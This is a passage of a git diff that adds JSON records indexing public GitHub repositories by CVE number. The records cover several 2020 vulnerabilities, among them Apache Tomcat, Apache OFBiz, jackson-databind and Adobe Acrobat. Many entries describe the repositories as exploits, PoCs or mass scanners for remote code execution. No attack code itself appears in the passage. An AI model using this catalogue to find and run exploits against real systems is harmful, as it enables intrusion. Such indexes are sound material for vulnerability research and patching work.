SkyWalking)", + "fork": false, + "created_at": "2021-07-19T06:50:17Z", + "updated_at": "2024-08-12T20:14:49Z", + "pushed_at": "2021-07-19T07:01:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9484.json b/2020/CVE-2020-9484.json new file mode 100644 index 0000000000..7278fad542 --- /dev/null +++ b/2020/CVE-2020-9484.json @@ -0,0 +1,573 @@ +[ + { + "id": 265151514, + "name": "tomcat-cluster-session-sync-exp", + "full_name": "threedr3am\/tomcat-cluster-session-sync-exp", + "owner": { + "login": "threedr3am", + "id": 19884279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19884279?v=4", + "html_url": "https:\/\/github.com\/threedr3am", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/threedr3am\/tomcat-cluster-session-sync-exp", + "description": "tomcat使用了自带session同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包, 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484,9484是session持久化的洞,这个是session集群同步的洞!", + "fork": false, + "created_at": "2020-05-19T05:12:53Z", + "updated_at": "2024-08-12T20:01:38Z", + "pushed_at": "2020-05-19T05:13:19Z", + "stargazers_count": 213, + "watchers_count": 213, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 213, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 265717610, + "name": "CVE-2020-9484", + "full_name": "masahiro331\/CVE-2020-9484", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/CVE-2020-9484", + "description": null, + "fork": false, + "created_at": "2020-05-21T00:41:06Z", + "updated_at": "2024-11-16T13:03:27Z", + "pushed_at": "2021-10-28T02:31:04Z", + "stargazers_count": 128, + "watchers_count": 128, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 128, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 265741960, + "name": "CVE-2020-9484", + "full_name": "seanachao\/CVE-2020-9484", + "owner": { + "login": "seanachao", + "id": 30539692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30539692?v=4", + "html_url": "https:\/\/github.com\/seanachao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seanachao\/CVE-2020-9484", + "description": "利用ceye批量检测CVE-2020-9484", + "fork": false, + "created_at": "2020-05-21T03:07:24Z", + "updated_at": "2022-03-23T08:03:58Z", + "pushed_at": "2020-05-21T02:30:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 265870392, + "name": "CVE-2020-9484", + "full_name": "IdealDreamLast\/CVE-2020-9484", + "owner": { + "login": "IdealDreamLast", + "id": 33090510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33090510?v=4", + "html_url": "https:\/\/github.com\/IdealDreamLast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IdealDreamLast\/CVE-2020-9484", + "description": "用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞", + "fork": false, + "created_at": "2020-05-21T14:30:46Z", + "updated_at": "2024-02-03T09:31:34Z", + "pushed_at": "2020-05-21T15:13:22Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 269379345, + "name": "CVE-2020-9484", + "full_name": "qerogram\/CVE-2020-9484", + "owner": { + "login": "qerogram", + "id": 29586629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29586629?v=4", + "html_url": "https:\/\/github.com\/qerogram", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qerogram\/CVE-2020-9484", + "description": "for Ubuntu 18.04, improve functions.", + "fork": false, + "created_at": "2020-06-04T14:19:12Z", + "updated_at": "2022-02-23T07:05:46Z", + "pushed_at": "2020-06-04T18:12:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 269770630, + "name": "CVE-2020-9484-Mass-Scan", + "full_name": "osamahamad\/CVE-2020-9484-Mass-Scan", + "owner": { + "login": "osamahamad", + "id": 59566963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59566963?v=4", + "html_url": "https:\/\/github.com\/osamahamad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osamahamad\/CVE-2020-9484-Mass-Scan", + "description": "CVE-2020-9484 Mass Scanner, Scan a list of urls for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE ", + "fork": false, + "created_at": "2020-06-05T20:40:28Z", + "updated_at": "2024-11-07T12:10:24Z", + "pushed_at": "2020-06-05T21:04:43Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 293086175, + "name": "CVE-2020-9484-exploit", + "full_name": "anjai94\/CVE-2020-9484-exploit", + "owner": { + "login": "anjai94", + "id": 30573192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30573192?v=4", + "html_url": "https:\/\/github.com\/anjai94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anjai94\/CVE-2020-9484-exploit", + "description": null, + "fork": false, + "created_at": "2020-09-05T13:56:51Z", + "updated_at": "2022-10-13T07:18:49Z", + "pushed_at": "2020-09-05T14:08:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 325878746, + "name": "CVE-2020-9484", + "full_name": "PenTestical\/CVE-2020-9484", + "owner": { + "login": "PenTestical", + "id": 57206134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57206134?v=4", + "html_url": "https:\/\/github.com\/PenTestical", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PenTestical\/CVE-2020-9484", + "description": null, + "fork": false, + "created_at": "2020-12-31T21:54:50Z", + "updated_at": "2024-10-15T06:49:51Z", + "pushed_at": "2022-04-16T14:22:27Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 329004194, + "name": "CVE-2020-9484-Scanner", + "full_name": "DanQMoo\/CVE-2020-9484-Scanner", + "owner": { + "login": "DanQMoo", + "id": 29651956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29651956?v=4", + "html_url": "https:\/\/github.com\/DanQMoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanQMoo\/CVE-2020-9484-Scanner", + "description": "A smol bash script I threw together pretty quickly to scan for vulnerable versions of the Apache Tomcat RCE. I'll give it some love when I have the time. ", + "fork": false, + "created_at": "2021-01-12T14:00:00Z", + "updated_at": "2022-04-17T09:09:57Z", + "pushed_at": "2020-06-10T07:08:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 333238894, + "name": "CVE-2020-9484", + "full_name": "AssassinUKG\/CVE-2020-9484", + "owner": { + "login": "AssassinUKG", + "id": 5285547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4", + "html_url": "https:\/\/github.com\/AssassinUKG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2020-9484", + "description": null, + "fork": false, + "created_at": "2021-01-26T22:51:30Z", + "updated_at": "2024-08-12T20:09:47Z", + "pushed_at": "2021-02-10T00:01:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 337782636, + "name": "CVE-2020-9484", + "full_name": "VICXOR\/CVE-2020-9484", + "owner": { + "login": "VICXOR", + "id": 43370621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43370621?v=4", + "html_url": "https:\/\/github.com\/VICXOR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VICXOR\/CVE-2020-9484", + "description": "POC for CVE-2020-9484", + "fork": false, + "created_at": "2021-02-10T16:27:07Z", + "updated_at": "2024-11-22T16:50:05Z", + "pushed_at": "2021-02-10T16:55:37Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "exploit", + "rce", + "tomcat" + ], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 343388829, + "name": "CVE-2020-9484", + "full_name": "DXY0411\/CVE-2020-9484", + "owner": { + "login": "DXY0411", + "id": 42259364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4", + "html_url": "https:\/\/github.com\/DXY0411", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXY0411\/CVE-2020-9484", + "description": null, + "fork": false, + "created_at": "2021-03-01T11:16:04Z", + "updated_at": "2021-03-08T10:02:52Z", + "pushed_at": "2021-03-08T10:02:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 368539603, + "name": "CVE-2020-9484", + "full_name": "RepublicR0K\/CVE-2020-9484", + "owner": { + "login": "RepublicR0K", + "id": 73670332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73670332?v=4", + "html_url": "https:\/\/github.com\/RepublicR0K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RepublicR0K\/CVE-2020-9484", + "description": "Apache Tomcat RCE (CVE-2020-9484)", + "fork": false, + "created_at": "2021-05-18T13:26:18Z", + "updated_at": "2024-06-25T17:12:35Z", + "pushed_at": "2021-05-18T13:27:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458246235, + "name": "CVE-2020-9484", + "full_name": "ColdFusionX\/CVE-2020-9484", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2020-9484", + "description": "POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)", + "fork": false, + "created_at": "2022-02-11T15:45:10Z", + "updated_at": "2024-08-12T20:20:31Z", + "pushed_at": "2022-02-11T18:02:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-9484", + "deserialization", + "docker", + "exploit", + "rce", + "serialization", + "tomcat" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 565892834, + "name": "CVE-2020-9484_Exploit", + "full_name": "d3fudd\/CVE-2020-9484_Exploit", + "owner": { + "login": "d3fudd", + "id": 76706456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76706456?v=4", + "html_url": "https:\/\/github.com\/d3fudd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3fudd\/CVE-2020-9484_Exploit", + "description": "Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE", + "fork": false, + "created_at": "2022-11-14T14:48:30Z", + "updated_at": "2024-11-16T13:03:24Z", + "pushed_at": "2023-04-17T14:52:50Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 858341238, + "name": "CVE-2020-9484", + "full_name": "0dayCTF\/CVE-2020-9484", + "owner": { + "login": "0dayCTF", + "id": 44453666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44453666?v=4", + "html_url": "https:\/\/github.com\/0dayCTF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dayCTF\/CVE-2020-9484", + "description": "Remake of CVE-2020-9484 by Pentestical", + "fork": false, + "created_at": "2024-09-16T18:17:52Z", + "updated_at": "2024-11-24T09:15:32Z", + "pushed_at": "2024-09-16T18:22:36Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863005801, + "name": "CVE-2020-9484", + "full_name": "Disturbante\/CVE-2020-9484", + "owner": { + "login": "Disturbante", + "id": 126893851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126893851?v=4", + "html_url": "https:\/\/github.com\/Disturbante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Disturbante\/CVE-2020-9484", + "description": "Bash POC for CVE-2020-9484 that i used in tryhackme challenge", + "fork": false, + "created_at": "2024-09-25T14:55:51Z", + "updated_at": "2024-09-25T14:56:44Z", + "pushed_at": "2024-09-25T14:56:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868366417, + "name": "PoC_CVE-2020-9484", + "full_name": "savsch\/PoC_CVE-2020-9484", + "owner": { + "login": "savsch", + "id": 119003089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119003089?v=4", + "html_url": "https:\/\/github.com\/savsch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/savsch\/PoC_CVE-2020-9484", + "description": "PoC exploit for CVE-2020-9484, and a vulnerable web application for its demonstration", + "fork": false, + "created_at": "2024-10-06T07:37:44Z", + "updated_at": "2024-10-10T05:04:16Z", + "pushed_at": "2024-10-06T14:08:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9495.json b/2020/CVE-2020-9495.json new file mode 100644 index 0000000000..2649ef2964 --- /dev/null +++ b/2020/CVE-2020-9495.json @@ -0,0 +1,33 @@ +[ + { + "id": 283590587, + "name": "CVE-2020-9495", + "full_name": "ggolawski\/CVE-2020-9495", + "owner": { + "login": "ggolawski", + "id": 35563296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35563296?v=4", + "html_url": "https:\/\/github.com\/ggolawski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggolawski\/CVE-2020-9495", + "description": null, + "fork": false, + "created_at": "2020-07-29T19:57:32Z", + "updated_at": "2022-07-06T23:37:28Z", + "pushed_at": "2020-07-29T20:54:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9496.json b/2020/CVE-2020-9496.json new file mode 100644 index 0000000000..deb111457d --- /dev/null +++ b/2020/CVE-2020-9496.json @@ -0,0 +1,250 @@ +[ + { + "id": 287762650, + "name": "CVE-2020-9496", + "full_name": "dwisiswant0\/CVE-2020-9496", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/CVE-2020-9496", + "description": null, + "fork": false, + "created_at": "2020-08-15T14:29:49Z", + "updated_at": "2024-08-12T20:04:45Z", + "pushed_at": "2020-08-16T01:04:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 353653665, + "name": "apache-ofbiz-CVE-2020-9496", + "full_name": "Vulnmachines\/apache-ofbiz-CVE-2020-9496", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/apache-ofbiz-CVE-2020-9496", + "description": null, + "fork": false, + "created_at": "2021-04-01T09:58:23Z", + "updated_at": "2024-08-12T20:11:45Z", + "pushed_at": "2021-06-10T17:25:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 363054000, + "name": "CVE-2020-9496", + "full_name": "g33xter\/CVE-2020-9496", + "owner": { + "login": "g33xter", + "id": 8503135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8503135?v=4", + "html_url": "https:\/\/github.com\/g33xter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g33xter\/CVE-2020-9496", + "description": "Apache OFBiz unsafe deserialization of XMLRPC arguments", + "fork": false, + "created_at": "2021-04-30T06:55:32Z", + "updated_at": "2024-02-20T12:01:32Z", + "pushed_at": "2021-04-30T08:00:38Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 365298270, + "name": "CVE-2020-9496", + "full_name": "cyber-niz\/CVE-2020-9496", + "owner": { + "login": "cyber-niz", + "id": 25560738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25560738?v=4", + "html_url": "https:\/\/github.com\/cyber-niz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyber-niz\/CVE-2020-9496", + "description": "CVE-2020-9496 manual exploit", + "fork": false, + "created_at": "2021-05-07T16:50:23Z", + "updated_at": "2021-05-07T17:43:18Z", + "pushed_at": "2021-05-07T17:43:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 367057442, + "name": "ofbiz-poc", + "full_name": "yuaneuro\/ofbiz-poc", + "owner": { + "login": "yuaneuro", + "id": 42265015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4", + "html_url": "https:\/\/github.com\/yuaneuro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuaneuro\/ofbiz-poc", + "description": "CVE-2020-9496和CVE-2021-26295利用dnslog批量验证漏洞poc及exp", + "fork": false, + "created_at": "2021-05-13T13:28:15Z", + "updated_at": "2024-08-12T20:12:58Z", + "pushed_at": "2021-05-13T13:53:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 374331501, + "name": "CVE-2020-9496", + "full_name": "ambalabanov\/CVE-2020-9496", + "owner": { + "login": "ambalabanov", + "id": 26865210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26865210?v=4", + "html_url": "https:\/\/github.com\/ambalabanov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambalabanov\/CVE-2020-9496", + "description": "XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03", + "fork": false, + "created_at": "2021-06-06T10:32:07Z", + "updated_at": "2021-06-06T13:53:59Z", + "pushed_at": "2021-06-06T13:53:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 392581141, + "name": "CVE-2020-9496", + "full_name": "s4dbrd\/CVE-2020-9496", + "owner": { + "login": "s4dbrd", + "id": 79448708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79448708?v=4", + "html_url": "https:\/\/github.com\/s4dbrd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4dbrd\/CVE-2020-9496", + "description": null, + "fork": false, + "created_at": "2021-08-04T06:48:31Z", + "updated_at": "2022-06-18T16:23:06Z", + "pushed_at": "2021-08-04T06:49:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 525091869, + "name": "CVE-2020-9496", + "full_name": "Ly0nt4r\/CVE-2020-9496", + "owner": { + "login": "Ly0nt4r", + "id": 87484792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87484792?v=4", + "html_url": "https:\/\/github.com\/Ly0nt4r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ly0nt4r\/CVE-2020-9496", + "description": "ApacheOfBiz 17.12.01 - Unauthorized Remote Code Executión ", + "fork": false, + "created_at": "2022-08-15T18:15:11Z", + "updated_at": "2023-04-11T10:38:18Z", + "pushed_at": "2023-04-23T15:47:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9547.json b/2020/CVE-2020-9547.json new file mode 100644 index 0000000000..ddbdb70089 --- /dev/null +++ b/2020/CVE-2020-9547.json @@ -0,0 +1,33 @@ +[ + { + "id": 244379753, + "name": "CVE-2020-9547", + "full_name": "fairyming\/CVE-2020-9547", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2020-9547", + "description": "CVE-2020-9547:FasterXML\/jackson-databind 远程代码执行漏洞", + "fork": false, + "created_at": "2020-03-02T13:37:21Z", + "updated_at": "2024-11-01T02:37:52Z", + "pushed_at": "2020-03-02T14:18:24Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9548.json b/2020/CVE-2020-9548.json new file mode 100644 index 0000000000..e2763dddc2 --- /dev/null +++ b/2020/CVE-2020-9548.json @@ -0,0 +1,33 @@ +[ + { + "id": 244381163, + "name": "CVE-2020-9548", + "full_name": "fairyming\/CVE-2020-9548", + "owner": { + "login": "fairyming", + "id": 44915879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44915879?v=4", + "html_url": "https:\/\/github.com\/fairyming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fairyming\/CVE-2020-9548", + "description": "CVE-2020-9548:FasterXML\/jackson-databind 远程代码执行漏洞", + "fork": false, + "created_at": "2020-03-02T13:43:47Z", + "updated_at": "2024-08-12T19:58:18Z", + "pushed_at": "2020-03-02T14:18:48Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9715.json b/2020/CVE-2020-9715.json new file mode 100644 index 0000000000..6691cd5e1a --- /dev/null +++ b/2020/CVE-2020-9715.json @@ -0,0 +1,64 @@ +[ + { + "id": 446336808, + "name": "CVE-2020-9715", + "full_name": "lsw29475\/CVE-2020-9715", + "owner": { + "login": "lsw29475", + "id": 13043359, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4", + "html_url": "https:\/\/github.com\/lsw29475", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsw29475\/CVE-2020-9715", + "description": null, + "fork": false, + "created_at": "2022-01-10T08:23:05Z", + "updated_at": "2023-02-17T00:28:53Z", + "pushed_at": "2022-01-26T07:12:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 530258491, + "name": "CVE-2020-9715", + "full_name": "wonjunchun\/CVE-2020-9715", + "owner": { + "login": "wonjunchun", + "id": 40604592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40604592?v=4", + "html_url": "https:\/\/github.com\/wonjunchun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wonjunchun\/CVE-2020-9715", + "description": "Adobe Acrobat Reader UAF vulnerability Exploit code", + "fork": false, + "created_at": "2022-08-29T14:33:40Z", + "updated_at": "2022-08-29T14:33:40Z", + "pushed_at": "2022-08-29T14:33:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9758.json b/2020/CVE-2020-9758.json new file mode 100644 index 0000000000..07083f9d3e --- /dev/null +++ b/2020/CVE-2020-9758.json @@ -0,0 +1,33 @@ +[ + { + "id": 245618403, + "name": "CVE-2020-9758", + "full_name": "ari034\/CVE-2020-9758", + "owner": { + "login": "ari034", + "id": 61799666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61799666?v=4", + "html_url": "https:\/\/github.com\/ari034", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ari034\/CVE-2020-9758", + "description": "Form submission for vulnerability in livezilla", + "fork": false, + "created_at": "2020-03-07T11:13:49Z", + "updated_at": "2024-08-12T19:58:27Z", + "pushed_at": "2020-03-07T11:19:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-9767.json b/2020/CVE-2020-9767.json new file mode 100644 index 0000000000..e1f12254c6 --- /dev/null +++ b/2020/CVE-2020-9767.json @@ -0,0 +1,37 @@ +[ + 